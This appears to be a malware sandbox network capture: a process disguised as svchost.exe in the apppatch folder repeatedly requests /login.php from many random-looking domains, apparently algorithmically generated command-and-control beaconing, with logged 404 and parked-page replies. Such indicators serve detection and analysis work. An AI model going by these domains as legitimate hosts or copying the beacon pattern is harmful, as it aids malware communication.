                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  7192.168.2.64972175.2.71.199801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.623383999 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  8192.168.2.649722208.100.26.245801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.638107061 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.129251003 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835262060 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.938725948 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:29 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.354407072 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.461287022 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.575489998 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.686667919 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  9192.168.2.649723199.59.243.227801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.681142092 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132131100 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:28 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:05:29 GMT; path=/
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.132220984 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                  Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDI5LCJwYWdlX3VybCI6I


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  10192.168.2.64972423.253.46.64801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.866193056 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.336357117 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:23 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.336369038 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  11192.168.2.64972585.17.31.122801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.902904034 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  12192.168.2.64972675.2.71.199801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.998550892 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  13192.168.2.649728154.212.231.82801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.835361958 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.765034914 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:30 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.777519941 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.135122061 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:30 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
